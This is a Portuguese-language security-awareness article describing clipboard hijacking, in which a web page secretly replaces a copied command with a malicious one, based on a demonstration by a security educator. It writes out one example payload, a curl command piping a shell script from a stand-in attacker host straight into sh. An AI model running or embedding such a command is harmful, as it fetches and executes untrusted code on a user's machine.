É verdade que vivemos em uma época em que velocidade é tudo e obter resultados rápidos é tudo o que importa. No entanto, poucas pessoas realmente param por um segundo e pensam nas consequências.
Todos os dias, milhões de programadores, administradores e pesquisadores de segurança executam tarefas simples, como copiar e colar comandos de páginas da web diretamente no console de seus PCs.
Embora muitos nem pensem nisso, as consequências são muito mais sérias e perigosas do que você pode imaginar, especialmente se você armazenar dados confidenciais ou valiosos.
Um conhecido especialista em segurança compartilhou o que realmente acontece quando você copia e cola conteúdo de páginas da web.
Copiar + colar é uma maneira fácil de obter um hack
Gabriel Friedlander, fundador da plataforma de educação em segurança Wizer, retirou a capa de um diagrama que o fará pensar duas vezes antes de copiar e colar comandos de páginas da web.
Copiar e colar conteúdo da Internet se tornou tão comum hoje em dia que ninguém pensa a respeito.
No entanto, Friedlander adverte que algumas páginas da web são mais enganosas do que podem parecer à primeira vista, e o que você pensa que copiou é muito diferente do que realmente fez.
E o pior de tudo, sem o conhecimento ou orientação necessária, a vítima só percebe seu erro após a inserção do texto, momento em que pode ser tarde demais.
O analista de segurança também elaborou um pequeno questionário para os leitores de seu blog, para que as pessoas possam realmente entender com que facilidade você reluta em abrir a porta para os cibercriminosos.
Fornecia um comando para ser copiado, mas a verdade pertinente só é revelada quando você cola o texto e vê o que realmente inseriu em sua configuração.
Depois de copiar o comando mostrado na imagem acima, o resultado da colagem vai te chocar, pois está longe do que você pensava que estava duplicando.
curl http://attacker-domain:8000/shell.sh | shAlém de um comando completamente diferente presente em sua área de transferência, o caractere de nova linha (ou retorno) no final significa que o exemplo acima será executado assim que for inserido diretamente no terminal Linux.
Portanto, é melhor você estar ciente do que realmente está acontecendo e tratar isso como uma séria ameaça à segurança. Não estamos dizendo que todos os sites ocultam conteúdo malicioso, mas você deve levar isso em consideração.
Você já foi hackeado inserindo comandos complicados em seu terminal? Compartilhe sua experiência conosco na seção de comentários abaixo.
Deixe um comentário